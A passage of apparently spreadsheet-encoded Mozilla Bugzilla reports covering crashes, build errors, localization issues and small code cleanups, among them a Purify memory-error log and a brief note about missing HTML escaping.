getItemsWithFlagUnset was added in this check-in http://bonsai.mozilla.org/cvsview2.cgi?diff_mode=context&amp;whitespace_mode=show&amp;root=/cvsroot&amp;subdir=mozilla/toolkit/mozapps/extensions/src&amp;command=DIFF_FRAMESET&amp;file=nsExtensionManager.js.in&amp;rev2=1.22&amp;rev1=1.21 and removed (I think) in bug 285544.
getStagedLeafName was added bug 286034 never used.
Removing these functions will save about 1.6KB of code size.</t>
  </si>
  <si>
    <t>CORE-91665</t>
  </si>
  <si>
    <t>[review]Debug|Dump Style Contexts doesn't work anymore</t>
  </si>
  <si>
    <t>Regression from the rule tree landing - bug 78695.
Dump Style Contexts doesn't work anymore. It was our main debugging tool to 
figure out whether a bug belongs to Layout or Style.</t>
  </si>
  <si>
    <t>CORE-351570</t>
  </si>
  <si>
    <t>improve nsSVGPatternFrame encapsulation</t>
  </si>
  <si>
    <t>Similar to bug 351384 except for pattern frame. I can't see any other use of this construction so I think this is it. Also fixed a couple of spelling mistakes in comments.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-230251</t>
  </si>
  <si>
    <t>crash sorting large folder by subject</t>
  </si>
  <si>
    <t>I suspect this was caused by the sort optimization Neil made (or exposed by it
at least). Purify reports the following:
[E] ABW: Array bounds write in memcpy {1 occurrence}
        Writing 203 bytes to 0x16b6b430 (43 bytes at 0x16b6b4d0 illegal)
        Address 0x16b6b430 is 16 bytes into a 176 byte block at 0x16b6b420
        Address 0x16b6b430 points to a malloc'd block in heap 0x02440000
        Thread ID: 0x860
        Error location
            memcpy         [memcpy.asm:109]
            nsMsgDBView::Sort(intint) [nsMsgDBView.cpp:3496]
                      info-&gt;folder = curFolder
                    }
             =&gt;     memcpy(info-&gt;key keyValue actualFieldLen)
                    //In order to align memory for systems that require it such
as HP-UX
                    //calculate the correct value to pad the actualFieldLen value
                    const PRUint32 align = sizeof(IdKey) - sizeof(IdDWord) - 1
            nsMsgThreadedDBView::Sort(intint) [nsMsgThreadedDBView.cpp:346]
                [E] ABW: Array bounds write in memcpy {1 occurrence}
                    Writing 203 bytes to 0x16b6b430 (43 bytes at 0x16b6b4d0 illegal)
                    Address 0x16b6b430 is 16 bytes into a 176 byte block at
0x16b6b420
                    Address 0x16b6b430 points to a malloc'd block in heap 0x02440000
                    Thread ID: 0x860
                    Error location
                    memcpy         [memcpy.asm:109]
                    nsMsgDBView::Sort(intint) [nsMsgDBView.cpp:3496]
                          info-&gt;folder = curFolder
                        }
                 =&gt;     memcpy(info-&gt;key keyValue actualFieldLen)
                        //In order to align memory for systems that require it
such as HP-UX
                        //calculate the correct value to pad the actualFieldLen
value
                        const PRUint32 align = sizeof(IdKey) - sizeof(IdDWord) - 1
                    nsMsgThreadedDBView::Sort(intint) [nsMsgThreadedDBView.cpp:346]
            Allocation location
                malloc         [dbgheap.c:129]
                PR_Malloc      [prmem.c:474]
                nsMsgDBView::Sort(intint) [nsMsgDBView.cpp:3470]
                        if ((PRUint32)(pTemp - pBase) + (keyOffset +
actualFieldLen) &gt;= allocSize) {
                          maxSize = (keyOffset + maxLen) * (arraySize - numSoFar)
                          allocSize = PR_MIN(maxBlockSize maxSize)
                 =&gt;       pTemp = (char *) PR_Malloc(allocSize)
                          NS_ASSERTION(pTemp out of memory can't sort)
                          if (!pTemp)
                          {</t>
  </si>
  <si>
    <t>CORE-492309</t>
  </si>
  <si>
    <t>Remove unused gfxTextRun flags</t>
  </si>
  <si>
    <t>Created attachment 376660
fix
gfxTextRunFactory::TEXT_ENABLE_NEGATIVE_SPACING is write-only.
gfxTextRunFactory::TEXT_HAS_LOW_SURROGATES is never-set. Because of that the RecordSurrogates function never does anything IsLowSurrogate is always false and they should all be removed.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-443375</t>
  </si>
  <si>
    <t>th / Thai</t>
  </si>
  <si>
    <t>[th] Search engine setup for Firefox 3 for Thai.</t>
  </si>
  <si>
    <t>We want to ship Firefox 3 a good list of search engines for Thai. 
We're going to work towards this in three phases. First the localization team and Mic (Michal Berman) will look at the market for the language and come up with a good set of search providers. Isriya we'll need your input on this the guidelines for making recommendations are on http://wiki.mozilla.org/Firefox_web_services_guidelines. Gen might be able to help out too.
For en-US we currently use this set to which we can fall back in the case of lacking localized alternatives:
Google Yahoo Amazon Answers CC eBay Wikipedia
After we decided on a particular search engine Mic will contact the owner and ask for permission and for specifics like proper search flags. undefined we'll likely need your help to at least get the contact information.
Once we have a specification on what the searchengines for Thai should look like the localization team and Axel will work on an implementation on that. This should happen by the localization team creating and attaching patches for the desired changes and requesting review from Axel. After a successful review the localization team will land them.
Please don't commit any modifications in l10n/th/browser/searchplugins to the cvs repository without a patch reviewed by Axel or someone else appointed by Mic. The data here is sensitive to users and our search partners thus the extra care here.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-378926</t>
  </si>
  <si>
    <t>support HOST_CMSRCS HOST_CMMSRCS .cc files in HOST_CPPSRCS</t>
  </si>
  <si>
    <t>Created attachment 262933
rules.mk changes
HOST programs on OSX don't support ObjC files as it turns out.  This patch allows for HOST_CMSRCS and HOST_CMMSRCS and also allows you to use C++ files ending in .cc in HOST_CPPSRCS.  In addition it respects CPP_PROG_LINK for linking HOST_PROGRAM.  Plus I added a few things to the showhost target just for my sanity's sake.</t>
  </si>
  <si>
    <t>FIREFOX-484026</t>
  </si>
  <si>
    <t>getItemGUID creates GUIDs for deleted items</t>
  </si>
  <si>
    <t>getItemGUID does not throw when called for a deleted places id.  Instead it creates a new GUID annotation (which will get expired later since the item was deleted).
The way I found this out is by observing bookmarks notifications and calling getItemGUID on onItemRemoved.  To my surprise I would get new GUIDs that I hadn't seen before.  Upon investigation I found out that places is calling onItemRemoved *after* deleting the item and thus exposing this bug.</t>
  </si>
  <si>
    <t>DEVELOPER_DOCUMENTATION-952156</t>
  </si>
  <si>
    <t>Managing Modals and Non Modal Dialogs wiki page missing feature request(s)</t>
  </si>
  <si>
    <t>:: Developer Documentation Request
      Request Type: New Documentation
     Gecko Version: unspecified
 Technical Contact: 
:: Details
https://developer.mozilla.org/en-US/docs/Web/Accessibility/ARIA/ARIA_Techniques/Using_the_alertdialog_role has a Managing Modals and Non Modal Dialogs link to https://developer.mozilla.org/en/ARIA/ARIA_Guides/Managing_Modal_and_Non_Modal_Dialogs but Managing_Modal_and_Non_Modal_Dialogs doesn't exist yet.
Although I was interested in such an article it's not a huge issue. It's a wiki &amp; that's its nature. The main/co-issue is: would it be possible to indicate via style and/or other means (tooltip etc.) to make links to non-existent articles more obvious. Links to nonexistent articles on Wikipedia &amp; other wikis for instance are red by default and some have a tooltip/title attribute indicating the destination page doesn't exist yet.
Also a feature idea: a button/link that would automatically submit a missing wiki page bug or automagically when a wiki page request gets a 404 when it's obvious (via referrer/logs/however) it's an intrawiki link.
Apologies if this should have been broken out into several bugs.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-131084</t>
  </si>
  <si>
    <t>sbs.co.kr - many pages have syntax error in meta charset tag</t>
  </si>
  <si>
    <t>Many pages on the SBS website have the following meta tag:
This should be:
instead (note the = in place of the - after charset).
Because of this syntax error these pages do not appear correctly unless the
charset is explicitly set to euc-kr. This is a major Korean website comparable
to http://nbc.com/ in the US.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-446454</t>
  </si>
  <si>
    <t>Adjust ip limit for OSCON attendees</t>
  </si>
  <si>
    <t>11:04  reed: justdave: could we increase the conn/ip for the oscon IP
11:04  ERROR Closing Link: laura[ip131.fa1-0-1.occ.iinet.com] (Too many connections from your IP)
Could someone take a look at this?  Thanks Mike.
Also it'd be a good idea to maybe look into using irssi on people or something instead.</t>
  </si>
  <si>
    <t>BUGZILLA-450609</t>
  </si>
  <si>
    <t>Add OS detection in install-module.pl to make it refuse to run on Windows</t>
  </si>
  <si>
    <t>We got several invalid bugs recently about install-module.pl working poorly on Windows. As this script doesn't work on this OS we should add OS detection to it and make it stops if it detects Windows. The message could tell them to use PPM instead and to follow instructions given by checksetup.pl.</t>
  </si>
  <si>
    <t>MOZILLA_LABS-421654</t>
  </si>
  <si>
    <t>Google Reader Popout link in RSS audio podcasts not working properly</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9b3) Gecko/2008020514 Firefox/3.0b3
Build Identifier: Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9b3) Gecko/2008020514 Firefox/3.0b3
In Google Reader Popout link in RSS audio podcasts not working properly instead of open a small popup window with a play button on it it just opens up whole new Google Reader webapp window.
Reproducible: Always
Steps to Reproduce:
1.Create weapp Google Reader link - reader.google.com
2.Open it subscribe to any audio podcast via RSS example - http://www.podshow.com/collection/121518.xml
3.Click Popout link in any podcast
Actual Results:  
it opens up whole new Google Reader webapp window.
Expected Results:  
it should open a small popup window with a play button on it
previous Prism version does it correctly</t>
  </si>
  <si>
    <t>rizork</t>
  </si>
  <si>
    <t>MOZILLA.ORG-430162</t>
  </si>
  <si>
    <t>Fix checkin comment for bug 429669</t>
  </si>
  <si>
    <t>Is:
Bug 316500. Fix merge regression so that fixed-background tables display correctly. r+sr=matsa=damon
Should be:
Bug 429669. Fix merge regression so that fixed-background tables display correctly. r+sr=matsa=damon
(The bug number is wrong the number is for the attachment id instead.)</t>
  </si>
  <si>
    <t>CORE-330602</t>
  </si>
  <si>
    <t>Crash with textPath text going off end of path</t>
  </si>
  <si>
    <t>On linux sometimes the branch with textPath (bug 327539) crashes inside cairo with the textcase on bug 306547.  This appears to be caused by us trying to do operations on characters that fall off the end of the path.  Handing NaN as the position/angle causes an invalid scale matrix to be set which then messes up the font backend.</t>
  </si>
  <si>
    <t>CORE-392282</t>
  </si>
  <si>
    <t>ASSERTION: nsCacheEntryHashTable not initialized during shutdown</t>
  </si>
  <si>
    <t>Created attachment 276738
stack traces for the assertions
Sometimes during shutdown (in automated testing) I get this pair of assertions.
###!!! ASSERTION: nsCacheEntryHashTable not initialized: 'initialized' file /Users/jruderman/trunk/mozilla/netwerk/cache/src/nsCacheEntry.cpp line 451
###!!! ASSERTION: QueryInterface needed: 'query_result.get() == mRawPtr' file ../../../dist/include/xpcom/nsCOMPtr.h line 594
Based on anecdotal evidence I think it happens most often when
1) The previous instance of Firefox crashed (rather than exiting normally).  (This makes some sense: Firefox intentionally throws out its cache after a crash.)
2) Firefox is asked to quit (goQuitApplication) very soon after the first page loads.
Even with that information it's pretty hard to reproduce.  But I do have stack traces -- thanks dbaron!
I'm testing with a Mac trunk debug build.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-166172</t>
  </si>
  <si>
    <t>dolog.pl sends bare LFs</t>
  </si>
  <si>
    <t>When setting up Bonsai using the Qmail MTA any CVS checkins resulted in
dolog.pl failing when it attempted to send its checkin mail. Qmail rejects the
email due to receiving only LF characters as line endings from the dolog.pl
program. It directs the user to a page describing the problem (see URL).
The solution to this problem is to replace all \n characters with \r\n (ie. all
LFs with CRLF pairs). I'll affix a patch in a sec.</t>
  </si>
  <si>
    <t>CORE-429661</t>
  </si>
  <si>
    <t>Crash [@ nsDocAccessible::FireShowHideEvents(nsIDOMNode* int unsigned int int int) ]</t>
  </si>
  <si>
    <t>Found while triaging Firefox 3.0b5 crash reports in a11y module. One report:
bp-6ec6d707-0aa2-11dd-a4df-0013211cbf8a
The line implied is:
http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/accessible/src/base/nsDocAccessible.cpp&amp;rev=1.238&amp;mark=2067#2067
Looks like a simple NULL pointer check. Patch coming up.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-381902</t>
  </si>
  <si>
    <t>Figure out the minimum set of makefiles needed for the build system</t>
  </si>
  <si>
    <t>Spun off from bug 380846.
XULRunner apps with a libxul-sdk that use the build system don't need to generate hundreds of makefiles just to run. Need to figure out the minimum set common to these apps.</t>
  </si>
  <si>
    <t>CORE-473906</t>
  </si>
  <si>
    <t>OS/2 follow-up to bug  Bug 448830 - Split nsInt(Rect|Size|Point|Margin)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (OS/2 U Warp 4.5 en-US rv:1.9.2a1pre) Gecko/20090112 Minefield/3.2a1pre
Build Identifier: 
Files in widget/src/os2 have to be updated after checkin for bug448830 to unbreak the build + a typo fix in an OS/2 section of layout/general/nsObjectFrame.cpp (s/AppUnitsPerDevicePixel/AppUnitsPerDevPixel)
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-520990</t>
  </si>
  <si>
    <t>[dashboard][shipping] Lack of escaping in customizeRow</t>
  </si>
  <si>
    <t>In customizeRow the 'revision' handling needs to escape the data in particular right now tags in comments get injected into the page.</t>
  </si>
  <si>
    <t>CORE-299376</t>
  </si>
  <si>
    <t>i want to uses attribute dy or dx to tspan in language svg for deer park</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b2) Gecko/20050531 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b2) Gecko/20050531 Firefox/1.0+
var oIntitule=this.oSvg.createElementNS(http://www.w3.org/2000/svg text)
		//oIntitule.setAttribute(xx)
		oIntitule.setAttribute(yy)
		oIntitule.setAttribute(idtexte)
		oIntitule.style.setProperty(font-familyVerdanaimportant)
		oIntitule.style.setProperty(fillblackimportant)
		oIntitule.style.setProperty(font-sizethis.GetHeight(14)+pximportant)
		for(var j=4 j&lt;oTabIntitule.lengthj++){
			var oValeur=this.oSvg.createElementNS(http://www.w3.org/2000/svg tspan)
			oValeur.setAttribute(xx)
			oValeur.setAttribute(dythis.GetHeight(20))
			this.GetY(this.iYtrue)
			var oValIntitule=this.oSvg.createTextNode(oTabIntitule[j]+:+oTabValeur[j])
			oValeur.appendChild(oValIntitule)
			oIntitule.appendChild(oValeur)
		}
	this.oContainer.appendChild(oIntitule)
Reproducible: Didn't try
Steps to Reproduce:
Actual Results:  
text1:5text2:6text3:6
Expected Results:  
text1:5
text2:6
text3:7
i use the dear park natif svg i want to write the text in align on coordonnees dy
it not possible about the tspan is all implemented in the navigator deer park.
i wait your answer</t>
  </si>
  <si>
    <t>kouejou</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-420788</t>
  </si>
  <si>
    <t>qm-pmac-fast02 needs a reboot.</t>
  </si>
  <si>
    <t>Though I can login with VNC I can't interact with anything I think that it could use a kick.</t>
  </si>
  <si>
    <t>SEAMONKEY-419636</t>
  </si>
  <si>
    <t>Find as you type stops finding further characters after a page scroll</t>
  </si>
  <si>
    <t>Steps to reproduce:
Load http://dev.mysql.com/doc/refman/5.0/en/index.html
Type: /retr. 
Note that ret of item 23.7. Retrieving results and output parameter values has been highlighted but that the r isn't highlighted and that if you try to search for retry (as opposed to retrieving) you just can't.
Any search which causes a page jump triggers this bug.
Seen with 2008022402 winxp. This is a regression since 20080220-ish. (I'll try to find the exact regression range soon.) This bug does NOT appear with Firefox 2008022604. (I'll test today's nightly first might be fixed already but I might need to interrupt testing in which case I figured filing first would be good so I won't forget.)</t>
  </si>
  <si>
    <t>CORE-170484</t>
  </si>
  <si>
    <t>Sometime font is very small when printing same page. (recently trunk)</t>
  </si>
  <si>
    <t>Sometime when I print same page the font size of the printing output are
different. I will upload ps file for each print result.</t>
  </si>
  <si>
    <t>SEAMONKEY-470544</t>
  </si>
  <si>
    <t>places history sorting doesn't work right in grouped view</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1b3pre) Gecko/20081220 SeaMonkey/2.0a3pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1b3pre) Gecko/20081220 SeaMonkey/2.0a3pre
There seems to be a bug in the sorting when the list is grouped - or I just don't understand the philosophy.
I'd expect the entries within a group (within the same site or day) be in the order indicated by View/Sort. But it only is directly after sorting until closing and reopening history or changing the grouping.
Reproducible: Always
Steps to Reproduce:
1. Ungrouped view sorted by last visited.
2. Group view by day
3. Order is unsorted
4. Sort by last visited again
5. Close and reopen history window
3. Order is unsorted</t>
  </si>
  <si>
    <t>juergenherz</t>
  </si>
  <si>
    <t>CORE-129346</t>
  </si>
  <si>
    <t>Fieldset renders incorrectly with style=float: left or any other shrink-wrap situation</t>
  </si>
  <si>
    <t>Fieldset seems to have problems rendering legend and calculating width when it
has style=float: left. See testcase.</t>
  </si>
  <si>
    <t>pali</t>
  </si>
  <si>
    <t>TOOLKIT-246687</t>
  </si>
  <si>
    <t>Firefox gets stuck at Finishing Extension Installation if the same extension is installed with /some/ changes.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win 9x 4.90 en-US rv:1.6) Gecko/20040210 Firefox/0.8
Build Identifier: Mozilla/5.0 (Windows U Win 9x 4.90 en-US rv:1.7) Gecko/20040614 Firefox/0.8.0+
I've not the slightest idea what changes trigger this exactly...
Reproducible: Always
Steps to Reproduce:
1. Install Magpie 3.11 from http://www.bengoodger.com/software/tabloader/
2. Restart
3. Install Testcase
4. Restart
Actual Results:  
Firefox is stuck at Finishing Extension Installation
Expected Results:  
Normal Startup
-console -safe-mode
*** Failed to load overlay chrome://tabdownloader/content/tabloaderOverlay.xul
zip builds
Also fails with
Mozilla/5.0 (Windows U Win 9x 4.90 en-US rv:1.7) Gecko/20040613 Firefox/0.8.0+
Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7) Gecko/20040614
Firefox/0.8.0+</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-369973</t>
  </si>
  <si>
    <t>Create in-product web pages for Firefox 2.0.0.2</t>
  </si>
  <si>
    <t>QA will be ready to start testing Firefox 2.0.0.2 specific in-product pages by locale by Tuesday 2/13. Please create 2002 specific versions of:
http://{locale}.www.mozilla.com/{locale}/firefox/2.0.0.2/firstrun/
http://{locale}.www.mozilla.com/{locale}/firefox/2.0.0.2/whatsnew/
This should just for testing purposes entail copying over the appropriate directories by locale from 2.0.0.1 to the corresponding 2.0.0.2 directories.</t>
  </si>
  <si>
    <t>CORE-104371</t>
  </si>
  <si>
    <t>shiftKey not captured in KEYPRESS event</t>
  </si>
  <si>
    <t>The shift key is not being captured by the event object when the KEYPRESS event 
is fired.  Alt and Ctrl keys seem to be working fine.</t>
  </si>
  <si>
    <t>Christopher.Strolia-Davis</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-263455</t>
  </si>
  <si>
    <t>Add Wayback extension</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.3) Gecko/20041004 Firefox/0.10.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.3) Gecko/20041004 Firefox/0.10.1
This extension allows you to check the page you are browsing and links in the
waybackmachine archive. Can be handy if the server is down or the page is
changed. It will add an entry called Wayback to your contextmenu. Works for
links and the current page. Permission from Waybackmachine.org was granted.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>CORE-193710</t>
  </si>
  <si>
    <t>Simple javascript crashes Mozilla (window.onerror)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win98 en-US rv:1.3b) Gecko/20030210
Build Identifier: Mozilla/5.0 (Windows U Win98 en-US rv:1.3b) Gecko/20030210
I will attach a small HTML file which consistently crashes Mozilla. It is zipped
because the crash does not occur when the file is read over the network.
Download the zipped HTML file and open it locally.
Disclaimer: I know nothing about javascript. I was working on a test case for
bug 167499.
Reproducible: Always
Steps to Reproduce:
1. Download crash.zip
2. Open crash.html locally
3.</t>
  </si>
  <si>
    <t>shill</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-527130</t>
  </si>
  <si>
    <t>Fennec: Download manager Remove button is not localized in Danish</t>
  </si>
  <si>
    <t>In multi-locale for Fennec's beta 5 the Remove button in the download manager is in English saying Remove on it.
Build id: Mozilla/5.0 (X11 U Linux armv7l Nokia N900 da rv:1.9.2b2pre)
Gecko/20091106 Firefox/3.6b2pre Fennec/1.0b5
Steps to Reproduce:
1. Open a multi-locale version of Fennec
2. Click on Options -&gt; Preferences -&gt; Languages
3. Select Dansk and restart
4. Once Fennec is started download a file
5. In the right panel click on the options button
6. Click on the downloads button
7. Select your downloaded file's entry
Actual Results:
Download manager will say Remove on the entry in English.
Expected Results:
Remove should not be in English.</t>
  </si>
  <si>
    <t>BUGZILLA-207206</t>
  </si>
  <si>
    <t>doeditparams.cgi XHTML compatibility</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.3.1) Gecko/20030428
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.3.1) Gecko/20030428
XHTML-like compatibility for doeditparams.cgi as specified in Bugzilla
developers guide.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>CORE-3179</t>
  </si>
  <si>
    <t>February 8th Nightly Build unable to access Netscape Webmail</t>
  </si>
  <si>
    <t>After user name and password is entered and the 'Submit' button is clicked
it gives the error:
Browser Window Alert: Sorry the user name must have at least three chracters.
My user name has 7 characters</t>
  </si>
  <si>
    <t>shukris</t>
  </si>
  <si>
    <t>CORE-148947</t>
  </si>
  <si>
    <t>[quirks]selecting past underline extends underline</t>
  </si>
  <si>
    <t>using build 2002060308/Linux RH7.1
create a html page with something like this:
some text underlined text normal text
Now click somewhere within the underlined text and drag along the text to
increase your selection
as soon as the selection moves past the underlined text the underline will
extend itself to cover more text.</t>
  </si>
  <si>
    <t>FIREFOX-350590</t>
  </si>
  <si>
    <t>Left Click on Back and Forward brings up dropdown</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1b2) Gecko/20060829 BonEcho/2.0b2
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1b2) Gecko/20060829 BonEcho/2.0b2
The clickable overshoot area around the back and forward buttons when using Small Icons has problems.  If you left click far enough to upper left you end up with the dropdown instead of the action you intended. I often overshoot the icons slightly and end up with the dropdown instead of going back or forward. This happens under a new profile and safe mode.
UI Tweaker's option to hide the dropdowns makes this more noticeable and moves the problem area below the buttons.  I have been seeing the problem for a good while but didn't realize what was going on until recently.
Reproducible: Always
Steps to Reproduce:
1.Move mouse to upper left active area on forward or back button.
2.Click in just the right area
3.
Actual Results:  
Dropdown is displayed
Expected Results:  
Go back or forward</t>
  </si>
  <si>
    <t>MAILNEWS_CORE_GRAVEYARD-493528</t>
  </si>
  <si>
    <t>Parallel build error with PalmSync</t>
  </si>
  <si>
    <t>The new SeaMonkey buildbots are building with -j4 and PalmSync enabled and sometimes run into a compile error with that:
make[7]: *** No rule to make target `../../../addrbook/src/addrbook_s.lib' needed by `palmsync.dll'.  Stop.
make[7]: *** Waiting for unfinished jobs....
make[7]: Leaving directory `/e/builds/slave/comm-1.9.1-win32-nightly/build/objdir/mailnews/extensions/palmsync/src'
make[6]: Leaving directory `/e/builds/slave/comm-1.9.1-win32-nightly/build/objdir/mailnews/extensions/palmsync'
make[5]: Leaving directory `/e/builds/slave/comm-1.9.1-win32-nightly/build/objdir/mailnews/extensions'
make[6]: *** [libs] Error 2
make[5]: *** [palmsync_libs] Error 2
make[4]: *** [extensions_libs] Error 2
make[4]: *** Waiting for unfinished jobs....
Note that _in the following output_ (i.e. the waiting for unfinished jobs) I see this:
rm -f addrbook_s.lib
lib -NOLOGO -OUT:addrbook_s.lib  nsAbManager.obj nsAbRDFDataSource.obj nsDirectoryDataSource.obj nsAbCardProperty.obj nsDirPrefs.obj nsAddrDatabase.obj nsAbDirProperty.obj nsAbAddressCollector.obj nsAddbookProtocolHandler.obj nsAbMDBDirProperty.obj nsAbMDBDirectory.obj nsAbMDBCard.obj nsAbBSDirectory.obj nsAddbookUrl.obj nsAbDirFactoryService.obj nsAbMDBDirFactory.obj nsAbDirectoryQuery.obj nsAbDirectoryQueryProxy.obj nsAbBooleanExpression.obj nsAbDirectoryRDFResource.obj nsAbQueryStringToExpression.obj nsAbView.obj nsVCard.obj nsVCardObj.obj nsMsgVCardService.obj nsAbLDIFService.obj nsAbContentHandler.obj nsAbOutlookDirFactory.obj nsAbOutlookDirectory.obj nsAbWinHelper.obj nsMapiAddressBook.obj nsWabAddressBook.obj nsAbLDAPDirectory.obj nsAbLDAPDirFactory.obj nsAbLDAPCard.obj nsAbLDAPListenerBase.obj nsAbLDAPDirectoryQuery.obj nsAbLDAPDirectoryModify.obj nsAbBoolExprToLDAPFilter.obj nsAbLDAPAutoCompFormatter.obj nsAbLDAPReplicationService.obj nsAbLDAPReplicationQuery.obj nsAbLDAPReplicationData.obj nsLDAPAutoCompleteSession.obj  
link -NOLOGO -DLL -OUT:import.dll -PDB:import.pdb -SUBSYSTEM:WINDOWS  nsImportModule.obj    ./module.res -NXCOMPAT -SAFESEH -DYNAMICBASE -MANIFEST:NO  -DEBUG -OPT:REF -OPT:nowin98   -IMPLIB:fake.lib  ../src/import_s.lib ../text/src/imptext_s.lib ../comm4x/src/imp4mail_s.lib  ../eudora/src/impEudra_s.lib  ../oexpress/importOE_s.lib  ../outlook/src/impOutlk_s.lib   ../../base/util/msgbsutl_s.lib   ../../../mozilla/dist/lib/unicharutil_s.lib ../../../mozilla/modules/libreg/src/mozreg_s.lib ../../../mozilla/dist/lib/xpcom.lib ../../../mozilla/dist/lib/xpcom_core.lib ../../../mozilla/dist/lib/nspr4.lib ../../../mozilla/dist/lib/plc4.lib ../../../mozilla/dist/lib/plds4.lib    kernel32.lib user32.lib gdi32.lib winmm.lib wsock32.lib advapi32.lib   
   Creating library fake.lib and object fake.exp
echo not_ranlib addrbook_s.lib
not_ranlib addrbook_s.lib
so the lib is built correctly but after PalmSync already caused the build to fail by needing it.
http://tinderbox.mozilla.org/showlog.cgi?log=SeaMonkey-Ports/1242630000.1242637006.9936.gz&amp;fulltext=1 is a log exposing this on a nightly cycle.
This is a matter of PalmSync not being able to be built in parllel the way it's done. Is there a simple solution?</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-413309</t>
  </si>
  <si>
    <t>Talos machines not reporting performance numbers</t>
  </si>
  <si>
    <t>Not seeing any data on Talos machines. Just L C.
Could be related to bug 413305. Won't open the tree until perf numbers are back but understand this may not be an ops issue.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-475630</t>
  </si>
  <si>
    <t>Add-ons Manager: De_a_ktivieren und _A_ktualisieren sollten verschiedene accesskeys haben</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-261114</t>
  </si>
  <si>
    <t>Update ScribbliesBrite</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.3) Gecko/20040921 Firefox/0.10
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.3) Gecko/20040921 Firefox/0.10
New theme listing: ScribbliesBrite 0.4
jar is here: http://www.pshrink.com/phoenix/ScribbliesBrite-0_4.jar
preview is here: http://www.pshrink.com/phoenix/ScribbliesBrite_preview.png
Reproducible: Always
Steps to Reproduce:
1.
2.
3.
A brightly colored theme with whimsical icons.
Created by Ken Lynch. Maintained by Ed Hume (edhume@gmail.com)</t>
  </si>
  <si>
    <t>FIREFOX-291401</t>
  </si>
  <si>
    <t>Unable to open messages due to JavaScript Application error</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.7) Gecko/20050414 Firefox/1.0.3
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.7) Gecko/20050414 Firefox/1.0.3
I have used Firefox to access my company's web-based e-mail since 0.9. Although
it was a little unreliable back then it eventually improved starting Firefox
1.0. Since then I have never used my IE. Well that was until I upgraded to 1.0.3.
I am still able to access my company's web-based e-mail but I am unable to open
any of my messages. Just selecting a message by clicking on it already produces
a javascript application error. I thought at first that there was a problem with
our mail server so I used that IE to access my mail. Imagine my disappointment
when it worked! So now I'm stucked again with IE to access my company e-mail!
Reproducible: Always
Steps to Reproduce:
1.Log-in.
2.Open Inbox.
3.Click on a message.
Actual Results:  
JavaScript Application error. Unable to view any message read or unread.
Expected Results:  
It should pop-up a new window showing the e-mail message.</t>
  </si>
  <si>
    <t>jayceebee23</t>
  </si>
  <si>
    <t>BUGZILLA-150785</t>
  </si>
  <si>
    <t>verify-new-product.html.tmpl doesn't set defaults</t>
  </si>
  <si>
    <t>The old screen you got when changing a bug's product defaulted the version
component and milestone to the current one if it was on the new product's lists.
The 2.16 code doesn't and so moving a bug from bugzilla to brower gives a
default milestone of M1.
If its not in the list we should then try the product's default
version/component/milestone but that part isn't a regression.</t>
  </si>
  <si>
    <t>NSPR-326168</t>
  </si>
  <si>
    <t>Add a UTF-16 API to load a library</t>
  </si>
  <si>
    <t>spun off from bug 162361.</t>
  </si>
  <si>
    <t>THUNDERBIRD-277905</t>
  </si>
  <si>
    <t>IMAP Message UID Greater 2099999999 not displayed</t>
  </si>
  <si>
    <t>on linux thunderbird 1.0 mails with UID greater then 209999999 won't displayed
in the message pane. 
on windows thunderbird works fine.
Mailserver was mercur messaging 2005.
thanks a lot
ha</t>
  </si>
  <si>
    <t>Helmut.Hartmann</t>
  </si>
  <si>
    <t>SEAMONKEY-67214</t>
  </si>
  <si>
    <t>parseInt() used instead of Math.round() or Math.floor() in embedding/components/ui/progressDlg/nsProgressDlg.js</t>
  </si>
  <si>
    <t>parseInt() is used all over the place in
